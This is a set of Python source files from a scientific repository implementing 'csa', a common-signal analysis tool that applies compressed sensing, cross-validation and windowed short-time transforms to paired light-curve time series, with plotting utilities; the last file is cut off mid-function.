"text": "import sys\nsys.path.append('..')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm, trange\n\nfrom csa import stcs, istcs\n\ndef main():\n infile1 = 'xdata.dat'\n infile2 = 'odata.dat'\n freqinfo = [0, 0.5, 10000]\n lambdainfo = [1e-1, 1e2, 20]\n nsegment = 1000\n noverlap = 500\n\n # cvdata = cv(infile1, infile2, freqinfo, lambdainfo, 5)\n # plt.errorbar(cvdata[:,0], cvdata[:,1], cvdata[:,2], fmt='o')\n # plt.xscale('log')\n # plt.xlabel(r'$\\lambda$')\n # plt.ylabel('MSE')\n # plt.show()\n\n xdata = np.loadtxt(infile1)\n odata = np.loadtxt(infile2)\n # f, t, X = stcs(infile1, infile2, freqinfo, 1e2, nsegment, noverlap)\n X = np.loadtxt('./x_stcs.dat')\n xrec, orec = istcs(X, freqinfo, xdata[:,0], odata[:,0],\n nsegment, noverlap)\n # x_data = stcs('./gx339_x_fir_original.dat', './gx339_o_fir_original.dat', [0,10,2000], 20, 50, 1)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5483325123786926,
"alphanum_fraction": 0.575419008731842,
"avg_line_length": 29.601036071777344,
"blob_id": "417ca22ac93aa24f7b09a666b917b1b858e6c8d1",
"content_id": "624d0fb685b9a03940dee071d024e8689067cfe0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5907,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 193,
"path": "/example/windowtest/tools.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom matplotlib.colors import Normalize\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nfrom tqdm import tqdm, trange\n\n\ndef get_freq(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _limit_phase(phase_diff):\n if phase_diff < -np.pi: # phase_lag > pi\n phase_diff_out = 2*np.pi + phase_diff\n elif phase_diff >= np.pi:\n phase_diff_out = -2*np.pi + phase_diff\n else:\n phase_diff_out = phase_diff\n return phase_diff_out\n\n\ndef make_summary(x, freqinfo, anti=False):\n\n # x\n x_data = x.reshape(4, int(freqinfo[2])).T\n df_x = pd.DataFrame(x_data, columns=['a', 'b', 'c', 'd'])\n\n # freq\n df_x['freq'] = get_freq(freqinfo)\n df_x['period'] = 1 / df_x.freq.values\n\n # norm\n df_x['norm1'] = np.sqrt(df_x.a.values**2 + df_x.b.values**2)\n df_x['norm2'] = np.sqrt(df_x.c.values**2 + df_x.d.values**2)\n df_x['norm12'] = np.sqrt(df_x.norm1.values**2 + df_x.norm2.values**2)\n\n # lag\n df_x['alpha1'] = np.arctan2(df_x.b[df_x.a != 0], df_x.a[df_x.a != 0])\n df_x['alpha2'] = np.arctan2(df_x.d[df_x.c != 0], df_x.c[df_x.c != 0])\n df_x.fillna(0, inplace=True)\n delta_alpha = list(map(_limit_phase, df_x.alpha2 - df_x.alpha1))\n df_x['lag'] = delta_alpha / (2 * np.pi * df_x.freq.values)\n\n # summary\n df_sum = df_x[['lag', 'norm12', 'norm1', 'norm2',\\\n 'period', 'freq']][df_x.norm12 > 0]\n if anti:\n df_sum = _make_antisum(df_sum)\n\n return df_sum\n\n\ndef phist(X, freqinfo, bins=10, lagrange=None, density=False):\n\n # add axis if X has 1-dimension\n if len(X.shape) == 1:\n X = X[:, np.newaxis]\n\n phists = []\n for i, x in enumerate(X.T):\n # make sumarry\n df_sum = make_summary(x, freqinfo)\n\n # get values\n lags = df_sum.lag\n norms = df_sum.norm12\n\n # get edges\n bin_edges = np.histogram_bin_edges(lags, bins=bins, range=lagrange)\n\n # get index which each value belongs to\n inds = np.digitize(lags, bin_edges) - 1\n\n # add each power\n powsums = np.zeros(len(bin_edges)-1)\n for ind in range(len(powsums)):\n powsums[ind] = norms[inds == ind].sum()\n if density:\n powsums /= powsums.sum()\n phists.append(powsums)\n\n phists = np.squeeze(np.array(phists).T)\n\n return phists, bin_edges\n\n\ndef plot_cbplot(x, freqinfo, threshold=None, lagrange=None,\n bin_edges=None, ax=None, anti=False):\n '''\n '''\n # make summary\n df_sum = make_summary(x, freqinfo, anti=anti)\n\n # figure\n if ax == None:\n fig, ax = plt.subplots()\n\n # color babble plot\n size = list(map(lambda n1, n2: n1/n2 if n1 <= n2 else n2/n1,\n df_sum.norm1, df_sum.norm2))\n log_size = np.log10(1 + np.array(size)) * 750\n im = ax.scatter(df_sum.lag, df_sum.norm12, c=df_sum.freq,\n cmap=cm.jet, alpha=0.8, s=log_size,\n norm=Normalize(freqinfo[0], freqinfo[1]))\n ax.set_ylim(np.min(df_sum.norm12))\n ax.set_yscale('log')\n ax.set_ylabel('Power')\n ax.set_xlabel('Lag')\n xlim = lagrange if lagrange else (bin_edges[0], bin_edges[-1])\n ax.set_xlim(xlim)\n\n # colorbat setting\n ax_divider = make_axes_locatable(ax)\n cax = ax_divider.append_axes(\"top\", size=\"7%\", pad=\"2%\")\n plt.colorbar(im, cax=cax, orientation='horizontal')\n cax.xaxis.set_ticks_position(\"top\")\n cax.xaxis.set_label_text(\"Frequency\")\n cax.xaxis.set_label_position(\"top\")\n\n return ax\n\n\ndef plot_omplot(x, freqinfo, lagrange=None, bins=10, anti=False,\n lag_mode='standard', threshold=None):\n ''' plot omplot which is combined with color babble plot and\n histgram and poer histgram\n '''\n # make summary\n df_sum = make_summary(x, freqinfo, anti=anti)\n # periodic sum\n if lag_mode == 'periodic':\n summ_peri = make_periodicsum(lagrange=lagrange)\n self.df_sum = summ_peri.df_sum\n\n fig = plt.figure(figsize=(8, 2*2+2))\n height = 0.8/2\n ax0 = fig.add_axes([0.10, 0.1+0*height, 0.85, height-0.2])\n\n # get hist value\n h, bin_edges = np.histogram(df_sum.lag, bins=bins, range=lagrange,\n density=True)\n ph, bin_edges = phist(x, freqinfo, bins=bins, lagrange=lagrange,\n density=True)\n\n # figure\n binwidth = np.diff(bin_edges).mean()\n ax0.bar(bin_edges[:-1], h, color=\"r\", width=binwidth,\n align=\"edge\", alpha=0.5, edgecolor=\"k\", label=\"Number\")\n ax0.bar(bin_edges[:-1], ph, color=\"b\", width=binwidth,\n align=\"edge\", alpha=0.5, edgecolor=\"k\", label=\"Power\")\n ax0.set_ylabel('Density')\n ax0.set_xlabel('Lag')\n ax0.legend(loc='best')\n\n # color babble plot\n ax1 = fig.add_axes([0.10, 0.1+1*height-0.2, 0.85, height+0.2],\n sharex=ax0)\n ax1 = plot_cbplot(x, freqinfo, ax=ax1, lagrange=lagrange,\n bin_edges=bin_edges, threshold=threshold)\n ax1.set_xlabel(None)\n plt.setp(ax1.get_xticklabels(), visible=False)\n\n return fig\n\n\ndef main():\n\n freqinfo = [0, 0.5, 2000]\n X = np.loadtxt('../X.dat')\n testrange = [-10, 10]\n\n lagmap, bin_edges = phist(X, freqinfo, lagrange=[-10,10], bins=20)\n time = np.arange(lagmap.shape[1])\n nbins = len(bin_edges) - 1\n lagmap[nbins-1 : nbins+1, :] = 0\n plt.pcolormesh(time, bin_edges[:-1], lagmap, shading='gouraud')\n plt.show()\n\n j = np.random.randint(0, lagmap.shape[-1])\n print(f'index: {j}')\n plot_omplot(X[:,j], freqinfo, lagrange=[-10, 10], bins='auto')\n plt.savefig('omplot_noavesub.png')\n plt.show()\n\n\nif __name__ =='__main__':\n main()\n\n"
},
{
"alpha_fraction": 0.6678200960159302,
"alphanum_fraction": 0.6816608905792236,
"avg_line_length": 18.266666412353516,
"blob_id": "d28b3013a29b485348153953ad920fe0ea1011b3",
"content_id": "a6f31a2a104ec3576efdc5bddcc9e534f4cb29df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 15,
"path": "/example/bootstrap/tests/test_bootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import pytest\nimport sys\nsys.path.append('..')\n\nfrom bootstrap import _get_savename\n\[email protected]\ndef dire(tmpdir):\n tmpfile = tmpdir.join('dire')\n yield str(tmpfile)\n tmpfile.remove()\n\n\ndef test_getsavename_name_01():\n assert _get_savename('name', 'dire') == 'name_00.dat'\n"
},
{
"alpha_fraction": 0.4901703894138336,
"alphanum_fraction": 0.5192660689353943,
"avg_line_length": 28.57364273071289,
"blob_id": "4ec29db687a089a1f45579c19392a38a5a33997c",
"content_id": "c374b3a721be94ccc128f4dd16b273fafdfe1712",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3815,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 129,
"path": "/example/bootstrap/bootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import os\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom csa.csa import stcs, istcs, cv\nfrom csa.cvresult import show_cvdata, lambda_fromcvdata\nfrom ccfbootstrap import ccfbootstrap\n\n\n# analysis option\nCV = 0\nSTCS = 0\nISTCS = 1\n\nCCF = 1\n\nFIGSHOW = 1\n\ndef _get_savename(basename: str, path_to_dir, digit=3, ext='dat'):\n files = os.listdir(path_to_dir)\n for i in range(10**(digit)):\n suffix = str(i).rjust(digit, '0')\n search_file = basename + '_' + suffix + '.' + ext\n if (search_file in files) is False:\n path_to_out = os.path.join(path_to_dir, search_file)\n return path_to_out\n break\n\ndef main():\n\n # constant\n tperseg = 1000\n toverlap = 500\n basewidth_triang = 2*(tperseg - toverlap)\n\n # load data\n data1 = np.loadtxt('../xdata.dat')\n data2 = np.loadtxt('../odata.dat')\n n1 = data1.shape[0]\n n2 = data2.shape[0]\n freqinfo = [0, 0.5, 2000]\n\n # cross-validation\n if CV:\n cv_sta = np.random.randint(toverlap, np.min([n1, n2]) - tperseg)\n cv_end = cv_sta + tperseg\n print(f'time range of cv: [{cv_sta}, {cv_end}]')\n cvdata = cv(data1[cv_sta:cv_end], data2[cv_sta:cv_end], freqinfo,\n [1e-2, 1e3, 20], droprate=.5)\n np.savetxt('cvdata.dat', cvdata)\n\n # plot cvdata\n show_cvdata(cvdata)\n plt.savefig('cvcurve.png')\n if FIGSHOW:\n plt.show()\n cvdata = np.loadtxt('./cvdata.dat')\n show_cvdata(cvdata)\n plt.savefig('cvcurve.png')\n plt.close()\n lam_min = lambda_fromcvdata(cvdata, mode='min')\n print(f'lam_min = {lam_min:.3f}')\n\n\n # bootstrap\n if STCS:\n for k in range(10):\n freqs, t, X = stcs(data1, data2, freqinfo, lam_min,\n tperseg, toverlap, droprate=0.5)\n filename = _get_savename('X', 'Xs')\n np.savetxt(filename, X)\n\n if ISTCS:\n filesX = os.listdir('Xs')\n print(f'number of X: {len(filesX)}')\n for fileX in filesX:\n path_to_fileX = os.path.join('Xs', fileX)\n X = np.loadtxt(path_to_fileX)\n\n # istcs\n data1_rec, data2_rec = istcs(X, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n fname_data1 = _get_savename('data1', 'Ys')\n np.savetxt(fname_data1, data1_rec)\n fname_data2 = _get_savename('data2', 'Ys')\n np.savetxt(fname_data2, data2_rec)\n\n # ccf\n if CCF:\n files_in_Ys = os.listdir('Ys')\n files_data1 = sorted([f for f in files_in_Ys if ('data1' in f)])\n files_data2 = sorted([f for f in files_in_Ys if ('data2' in f)])\n files_data1 = list(map(lambda f, suf: suf + f,\n files_data1,\n np.repeat('Ys/', len(files_data1))))\n files_data2 = list(map(lambda f, suf: suf + f,\n files_data2,\n np.repeat('Ys/', len(files_data2))))\n\n # collect data1\n Y1 = []\n for file_data1 in files_data1:\n data1 = np.loadtxt(file_data1)\n t1 = data1[:,0]\n Y1.append(data1[:,1])\n Y1 = np.array(Y1)\n\n # collect data2\n Y2 = []\n for file_data2 in files_data2:\n data2 = np.loadtxt(file_data2)\n t2 = data2[:,0]\n Y2.append(data2[:,1])\n Y2 = np.array(Y2)\n\n for y1 in Y1:\n plt.plot(t1, y1, alpha=.3)\n plt.show()\n\n lags, c_low, c_med, c_hig = ccfbootstrap(Y1, Y2, maxlags=200)\n plt.fill_between(lags, c_low, c_hig, alpha=.5)\n plt.plot(lags, c_med)\n plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5537090301513672,
"alphanum_fraction": 0.5800132155418396,
"avg_line_length": 31.219858169555664,
"blob_id": "773cce61a57678bc5ea6e29e523f7751327f4a59",
"content_id": "86bdbd6826d2c08618d23b63967e3e15c6dd7ef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9086,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 282,
"path": "/csa/run.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from concurrent.futures import ProcessPoolExecutor\n# import os\n\nimport numpy as np\nfrom sklearn.model_selection import KFold\nfrom tqdm import tqdm\n\nfrom csa.make_matrix import mkmat_cs\nfrom csa.fista import fista\nfrom csa.window_function import WindowGenerator\nfrom csa.summary_handler import SummaryNew\nfrom csa.deco import stopwatch\n\n\n__all__ = ['cs', 'cv', 'stcs', 'istcs']\n\n\n# functions for csa\ndef _sub_ave(flux):\n f = np.array(flux)\n f_out = f - f.mean()\n return f_out\n\n\ndef _get_minmax(*args):\n a = np.hstack(args)\n return a.min(), a.max()\n\n\ndef _get_frecvec(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _complement_index(ind):\n comp = np.ones(len(ind), dtype=bool)\n comp[ind] = False\n return comp\n\n\ndef _query_lightcurve(data, timerage):\n data_out = data[np.where((timerage[0] <= data[:, 0]) &\n (data[:, 0] < timerage[1]))]\n return data_out\n\n\ndef _drop_sample(data, rate):\n n_data = data.shape[0]\n n_drop = int(n_data * rate)\n index_drop = np.random.RandomState().choice(\n n_data - 1, n_drop, replace=False)\n data_del = np.delete(data, index_drop, 0)\n return data_del\n\n\ndef _segment_time(t_sta, t_end, tperseg, toverlap):\n # set constant\n tstep = tperseg - toverlap\n nstep = (t_end - t_sta - tperseg) // tstep + 2\n\n # calcurate edge of lefts and rights\n edge_left = t_sta + np.arange(nstep)*tstep\n edge_right = t_sta + tperseg + np.arange(nstep)*tstep\n\n # concat edges\n segranges = np.array(list(zip(edge_left, edge_right)))\n return segranges\n\n\ndef _search_index(original, condition):\n lis = list(original)\n indices = np.array(list(map(lambda a: lis.index(a),\n condition)))\n return indices\n\n\n# main functions; cs, cv stcs istcs\ndef cs(data1, data2, freqinfo, lam):\n freqs, x = fista(data1, data2, freqinfo, lam)\n return freqs, x\n\n\ndef _cv(data1, data2, freqinfo, lam, nfold=5):\n\n # freq vector\n freqs = _get_frecvec(freqinfo)\n\n # get nfold index\n kf1 = KFold(nfold, shuffle=True)\n kf2 = KFold(nfold, shuffle=True)\n sp1 = kf1.split(data1)\n sp2 = kf2.split(data2)\n\n # cross-validation\n rms = np.zeros(nfold)\n for i, ((i_tr1, i_te1), (i_tr2, i_te2)) in enumerate(zip(sp1, sp2)):\n # split data into one for train and test\n data1_tr, data1_te = data1[i_tr1], data1[i_te1]\n data2_tr, data2_te = data2[i_tr2], data2[i_te2]\n\n # calcurate rms\n freq, x_tr = fista(data1_tr, data2_tr, freqinfo, lam)\n A_mat_te = mkmat_cs(data1_te[:, 0], data2_te[:, 0], freqs)\n y_te = np.dot(A_mat_te, x_tr)\n data_te = np.hstack([data1_te[:, 1], data2_te[:, 1]])\n rms[i] = np.sqrt(np.dot((data_te - y_te).T, data_te - y_te))\n return rms.mean(), rms.std()\n\n\n@stopwatch\ndef cv(data1, data2, freqinfo, lambdainfo, nfold=5,\n droprate=None, max_workers=None, set_verbose=True):\n\n # use window and subtract average\n data1_win = data1.copy()\n data2_win = data2.copy()\n\n # drop some samples\n if droprate:\n data1_win = _drop_sample(data1, droprate)\n data2_win = _drop_sample(data2, droprate)\n\n # use window function\n t_minmax = _get_minmax(data1[:, 0], data2[:, 0])\n window = WindowGenerator(t_minmax)\n window.hann()\n data1_win[:, 1] = _sub_ave(data1_win[:, 1]) * window.gene(data1_win[:, 0])\n data2_win[:, 1] = _sub_ave(data2_win[:, 1]) * window.gene(data2_win[:, 0])\n\n # set lambda info\n lambdas = np.logspace(np.log10(lambdainfo[0]),\n np.log10(lambdainfo[1]),\n lambdainfo[2])\n # print('lambdas:\\n{}'.format(lambdas))\n\n # cross-validation with multi process\n cvdata = np.zeros((3, lambdas.shape[0])).T\n cvdata[:, 0] = lambdas\n with ProcessPoolExecutor(max_workers) as executor:\n futures = tqdm([executor.submit(_cv, lam=lam,\n data1=data1_win,\n data2=data2_win,\n freqinfo=freqinfo)\n for lam in lambdas],\n disable=not set_verbose) # tqdm option\n for k, future in enumerate(futures):\n cvdata[k, 1:] = future.result()\n\n return cvdata\n\n\ndef _stcs(data1, data2, segrange, freqinfo, lam, droprate=None):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_win = data1_seg.copy()\n data2_seg_win = data2_seg.copy()\n\n # use window fuction\n window = WindowGenerator(segrange)\n window.hann()\n data1_seg_win[:, 1] = \\\n _sub_ave(data1_seg[:, 1]) * window.gene(data1_seg[:, 0])\n data2_seg_win[:, 1] = \\\n _sub_ave(data2_seg[:, 1]) * window.gene(data2_seg[:, 0])\n\n # drop rows\n if droprate:\n data1_seg_win = _drop_sample(data1_seg_win, droprate)\n data2_seg_win = _drop_sample(data2_seg_win, droprate)\n\n # estimate\n freq, x_seg = fista(data1_seg_win, data2_seg_win, freqinfo, lam)\n return x_seg\n\n\n@stopwatch\ndef stcs(data1, data2, freqinfo, lam, tperseg, toverlap,\n window='hann', droprate=None, max_workers=None,\n set_verbose=True):\n\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:, 0], data2[:, 0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # short time CS with multithread\n X = np.zeros((freqinfo[2]*4, segranges.shape[0]))\n with ProcessPoolExecutor(max_workers) as executor:\n futures = tqdm([executor.submit(_stcs, segrange=segrange,\n data1=data1, data2=data2,\n freqinfo=freqinfo,\n lam=lam, droprate=droprate)\n for segrange in segranges],\n disable=not set_verbose) # tqdm option\n for i, future in enumerate(futures):\n X[:, i] = future.result()\n\n # output\n t = np.append(segranges[:, 0], segranges[-1, 0]+(tperseg-toverlap))\n freq = _get_frecvec(freqinfo)\n # np.savetxt('X.dat, X)\n return freq, t, X\n\n\ndef _istcs(x, segrange, data1, data2, freqinfo, need_sect, add_ave, **winargs):\n # print(f'start {segrange}')\n\n # query time which is in segrange\n data1_seg = _query_lightcurve(data1, segrange)\n data2_seg = _query_lightcurve(data2, segrange)\n data1_seg_out = data1_seg.copy()\n data2_seg_out = data2_seg.copy()\n\n # make summary instance\n # (later summary instance -> x instance)\n summ = SummaryNew(x, freqinfo)\n y1, y2 = summ.pred(data1_seg[:, 0], data2_seg[:, 0])\n\n # reconstruct\n window = WindowGenerator(segrange)\n window.triang(winargs['winargs']['basewidth'])\n mean1_seg = data1_seg[:, 1].mean() if add_ave else 0\n mean2_seg = data2_seg[:, 1].mean() if add_ave else 0\n wy1 = window.gene(data1_seg[:, 0]) * (y1 + mean1_seg)\n wy2 = window.gene(data2_seg[:, 0]) * (y2 + mean2_seg)\n\n # substitution; to conserve energy, it is divided by\n # Energy Correction Factor (ECF)\n win_sect = window.sect\n data1_seg_out[:, 1] = wy1 * (need_sect/win_sect)\n data2_seg_out[:, 1] = wy2 * (need_sect/win_sect)\n\n # print(f'finish {segrange}')\n return data1_seg_out, data2_seg_out\n\n\n@stopwatch\ndef istcs(X, data1, data2, freqinfo, tperseg, toverlap,\n max_workers=None, set_verbose=True, add_ave=True,\n **winargs):\n '''\n T: ndarray\n The series of start time of each segment\n '''\n # calucurate segranges\n t_min, t_max = _get_minmax(data1[:, 0], data2[:, 0])\n segranges = _segment_time(t_min, t_max, tperseg, toverlap)\n\n # prepare ndarray for reconstraction\n y1_rec = data1.copy()\n y2_rec = data2.copy()\n y1_rec[:, 1] = np.zeros(data1.shape[0])\n y2_rec[:, 1] = np.zeros(data2.shape[0])\n\n with ProcessPoolExecutor(max_workers) as executor:\n need_sect = (tperseg - toverlap) * 1\n futures = tqdm([executor.submit(_istcs, x=x, segrange=segrange,\n data1=data1, data2=data2, freqinfo=freqinfo,\n need_sect=need_sect, add_ave=add_ave,\n winargs=winargs)\n for segrange, x in zip(segranges, X.T)],\n disable=not set_verbose) # tqdm option\n for i, future in enumerate(futures):\n # get results\n data1_seg_out, data2_seg_out = future.result()\n\n # search index\n indices_t1 = _search_index(data1[:, 0], data1_seg_out[:, 0])\n indices_t2 = _search_index(data2[:, 0], data2_seg_out[:, 0])\n\n # add results\n y1_rec[indices_t1, 1] = \\\n y1_rec[indices_t1, 1] + data1_seg_out[:, 1]\n y2_rec[indices_t2, 1] = \\\n y2_rec[indices_t2, 1] + data2_seg_out[:, 1]\n\n return y1_rec, y2_rec\n"
},
{
"alpha_fraction": 0.4954954981803894,
"alphanum_fraction": 0.4954954981803894,
"avg_line_length": 28.382352828979492,
"blob_id": "8bd2b3530bbc25dbea320d2e1bc00a2deb9bbb00",
"content_id": "85e1a773d572e6e0bcda73b7428b8bb821f4256c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 999,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 34,
"path": "/csa/deco.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import time\nimport os\n\n\ndef stopwatch(func):\n def wrapper(*arg, **kargs):\n try:\n if kargs['set_verbose'] is False:\n res = func(*arg, **kargs)\n else:\n raise KeyError\n except KeyError:\n start = time.time()\n print(f'start {func.__name__}')\n res = func(*arg, **kargs)\n dura = (time.time() - start)\n print(time.strftime(f'finish {func.__name__}: %H:%M\\'%S\\\"',\n time.gmtime(dura)))\n return res\n return wrapper\n\n\ndef change_directory(path_to_dir):\n def _change_directory(func):\n def wrapper(*args, **kargs):\n current_dir = os.getcwd()\n if os.path.exists(path_to_dir) is False:\n os.makedirs(path_to_dir)\n os.chdir(path_to_dir)\n results = func(*args, **kargs)\n os.chdir(current_dir)\n return(results)\n return wrapper\n return _change_directory\n"
},
{
"alpha_fraction": 0.5927272439002991,
"alphanum_fraction": 0.607272744178772,
"avg_line_length": 20.153846740722656,
"blob_id": "8164213f882209d3322fd9f0b66856cad3edc53b",
"content_id": "5909455185a66987c6113de8eefe8aa7d408d2e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/setup.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nsetup(\n name='csa',\n version='0.0.1',\n description=\"common-signal analysis tool\",\n long_description=\"\",\n author='Tomoki Omama',\n classifiers=[\n \"Development Status :: 1 - Planning\"\n ],\n packages=['csa']\n)\n"
},
{
"alpha_fraction": 0.4549036920070648,
"alphanum_fraction": 0.4943082332611084,
"avg_line_length": 25.25287437438965,
"blob_id": "3967cc01c7243de16349bea1a90d5f9b36442365",
"content_id": "ab24f9098c9ca4cf5e640c128da5a01040624310",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2284,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 87,
"path": "/csa/window_function.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\ndef _triang(t, basewidth, T):\n bw = basewidth\n if (((T-bw)/2 <= t) & (t < T/2)):\n w = 2*t/bw - (T-bw)/bw\n elif ((T/2 <= t) & (t < (T+bw)/2)):\n w = -2*t/bw + (T+bw)/bw\n else:\n w = 0\n return w\n\ndef _hann(t, T):\n w = 0.5 - 0.5*np.cos(2*np.pi*t/T)\n return w\n\nclass WindowGenerator():\n\n def __init__(self, segrange):\n\n # set first time\n self.t0 = segrange[0]\n self.tm1 = segrange[1]\n self.T = segrange[1] - segrange[0]\n\n # make function\n w = lambda t: 0*t + 1\n self.func = w\n\n def __call__(self, t):\n assert np.all((t >= self.t0) & (t <= self.tm1)), ValueError(\n f't must be between {self.t0:.3f} <= t <= {self.tm1:.3f}')\n return self.func(t - self.t0)\n\n def gene(self, t):\n assert np.all((t >= self.t0) & (t <= self.tm1)), ValueError(\n f't must be between {self.t0:.3f} <= t <= {self.tm1:.3f}')\n return self.func(t - self.t0)\n\n def acf(self):\n n = 1000\n t = np.linspace(self.t0, self.tm1, n)\n w = self.func(t - self.t0)\n acf = 1 / (np.sum(w)/n)\n return acf\n\n\n def ecf(self):\n n = 1000\n t = np.linspace(self.t0, self.tm1, n)\n w = self.func(t - self.t0)\n ecf = np.sqrt(1 / (np.sum(w**2)/n))\n return ecf\n\n def hann(self):\n self.func = np.frompyfunc(lambda t: _hann(t, self.T),\n 1, 1)\n self.sect = 0.5 * self.T\n self.ecf = 1.63\n self.acf = 2.0\n\n def triang(self, basewidth):\n # set triangular function as universal function by using\n # numpy.frompyfunc\n self.func = np.frompyfunc(lambda t: _triang(t, basewidth, self.T),\n 1, 1)\n self.sect = 0.5 * basewidth\n self.acf = (basewidth/2)/self.T\n self.ecf = 2/3 * basewidth #?\n\n\ndef main():\n np.random.seed(2021)\n t = np.arange(1, 101) + np.random.normal(0, 0.1, 100)\n w = Window(t)\n tt = np.linspace(2, 99, 10000)\n w.triang(basewidth=2)\n plt.plot(tt, w(tt))\n w.hann()\n plt.plot(tt, w(tt))\n plt.legend(['triang', 'hann'])\n plt.show()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.49778521060943604,
"alphanum_fraction": 0.5201491117477417,
"avg_line_length": 33.34508514404297,
"blob_id": "3a46c00a46fbe3632483a93ad94631fd0aa07604",
"content_id": "baeeaf58008836369fc12c93f73093fb3a93c2e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18512,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 539,
"path": "/csa/summary_handler.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import math\nimport os\n\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import Normalize\n# from mpl_toolkits.axes_grid1.colorbar import colorbar\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nimport scipy.stats as stats\n# import seaborn as sns; sns.set()\n# sns.set_style(\"whitegrid\")\n\nfrom csa.signiftest import LagSignifTest\n\n__all__ = ['read_summary']\n\ndef read_summary(path_to_summary, path_to_x, freq_info):\n\n df_sum = pd.read_csv(\n path_to_summary, sep=' ',\n names=[\"lag\", \"norm12\", \"norm1\", \"norm2\", \"period\", \"freq\"])\n x_vec = np.loadtxt(path_to_x)[:, 1]\n\n return Summary(df_sum, x_vec, freq_info)\n\ndef limit_phase(phase_diff):\n if phase_diff < -np.pi: # phase_lag > pi\n phase_diff_out = 2*np.pi + phase_diff\n elif phase_diff >= np.pi:\n phase_diff_out = -2*np.pi + phase_diff\n else:\n phase_diff_out = phase_diff\n return phase_diff_out\n\ndef make_summary(x, freq_info):\n # x\n x_data = x.reshape(4, int(freq_info[2])).T\n df_x = pd.DataFrame(x_data, columns=['a', 'b', 'c', 'd'])\n # freq\n freq_lo = freq_info[0]\n freq_up = freq_info[1]\n n_freq = int(freq_info[2])\n delta_freq = (freq_up - freq_lo) / n_freq\n df_x['freq'] = freq_lo + delta_freq * (df_x.index.values + 0.5)\n df_x['period'] = 1 / df_x.freq.values\n # norm\n df_x['norm1'] = np.sqrt(df_x.a.values**2 + df_x.b.values**2)\n df_x['norm2'] = np.sqrt(df_x.c.values**2 + df_x.d.values**2)\n df_x['norm12'] = np.sqrt(df_x.norm1.values**2 + df_x.norm2.values**2)\n # lag\n df_x['alpha1'] = np.arctan2(df_x.b[df_x.a != 0], df_x.a[df_x.a != 0])\n df_x['alpha2'] = np.arctan2(df_x.d[df_x.c != 0], df_x.c[df_x.c != 0])\n df_x.fillna(0, inplace=True)\n delta_alpha = list(map(limit_phase, df_x.alpha2 - df_x.alpha1))\n df_x['lag'] = delta_alpha / (2 * np.pi * df_x.freq.values)\n\n df_sum = df_x[['lag', 'norm12', 'norm1', 'norm2', 'period', 'freq']]\\\n [df_x.norm12 > 0]\n\n return df_sum\n\ndef get_index_fromfreq(freq, freq_info):\n freq_lo = freq_info[0]\n freq_up = freq_info[1]\n n_freq = int(freq_info[2])\n delta_freq = (freq_up - freq_lo) / n_freq\n ind = (freq - freq_lo) / delta_freq -0.5\n print(ind)\n return ind\n\ndef get_round_of_2nd_digit(d, mode):\n d_abs = np.abs(d)\n log_d_abs = np.log10(d_abs)\n diff_dig_from_m1 = np.log10(0.1) - np.floor(log_d_abs)\n d_tmp = d * 10**(diff_dig_from_m1 + 1)\n d_tmp2 = np.floor(d_tmp) if mode == 'low' else np.ceil(d_tmp)\n d_out = d_tmp2 / 10**(diff_dig_from_m1 + 1)\n return d_out\n\n\ndef set_bins(low, hig, binsize):\n\n def get_deci_nonzero(a):\n a = float(round(a,10))\n deci_str = 